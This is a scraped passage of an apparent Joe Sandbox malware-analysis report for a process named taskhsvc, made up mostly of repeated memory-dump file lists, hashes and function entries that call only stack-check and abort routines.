Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: e25fa99da3f358a7b7e8bb2b8443d00111ab880f6800284b8f7dc9b44c13ba3c
Instruction ID: e7b5cd18fd17de9c7dc444c74f3604a3f4290c2932a4a357d798d06486ecd4f7
Opcode Fuzzy Hash: e25fa99da3f358a7b7e8bb2b8443d00111ab880f6800284b8f7dc9b44c13ba3c
Instruction Fuzzy Hash: 3BB09230704402978F14D779D9939387360EF45338B2D074970339A1D68E30E816E771

Uniqueness

Uniqueness Score: -1.00%

Function 00D96202 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00D963EC

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: e25fa99da3f358a7b7e8bb2b8443d00111ab880f6800284b8f7dc9b44c13ba3c
Instruction ID: e7b5cd18fd17de9c7dc444c74f3604a3f4290c2932a4a357d798d06486ecd4f7
Opcode Fuzzy Hash: e25fa99da3f358a7b7e8bb2b8443d00111ab880f6800284b8f7dc9b44c13ba3c
Instruction Fuzzy Hash: 3BB09230704402978F14D779D9939387360EF45338B2D074970339A1D68E30E816E771

Uniqueness

Uniqueness Score: -1.00%

Function 00DC0D6B Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00DC0D7C

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 0c5c95eb149f0960619a65e3bfcf8e352cbaf785469b650187a46ea1a3f8aa6b
Instruction ID: 9de31d668cf9f710d675d42f61ff9d1147f288e8778b597978b14084aaaaa3c1
Opcode Fuzzy Hash: 0c5c95eb149f0960619a65e3bfcf8e352cbaf785469b650187a46ea1a3f8aa6b
Instruction Fuzzy Hash: EBC04C74E001179BCF00DBE8CD42AAEB7B1FF48304B194A449015E7209C370B5169AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00D953CA Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00D953D8

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 6db8d5d1e3fb551629489e9f83068dc659d51b334786844b870376706acaa75a
Instruction ID: d3b866bc836f95e5155e982e3334ea9655f7354aad21fbc4fa438834858bde2a
Opcode Fuzzy Hash: 6db8d5d1e3fb551629489e9f83068dc659d51b334786844b870376706acaa75a
Instruction Fuzzy Hash: F8B09230A00506DBCF00DBA8D983A6EB7B1EF88358B298A409100A620D82B0B8139AA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E040E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E040C2), ref: 00E04158
abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E040C2), ref: 00E0419F
abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E040C2), ref: 00E041F0
__stack_chk_fail.LIBSSP-0 ref: 00E0424F

Part of subcall function 00E02E0B: __stack_chk_fail.LIBSSP-0 ref: 00E02E9D

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Strings

(p, xrefs: 00E041D8
$h, xrefs: 00E041D0

Memory Dump Source

Source File: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
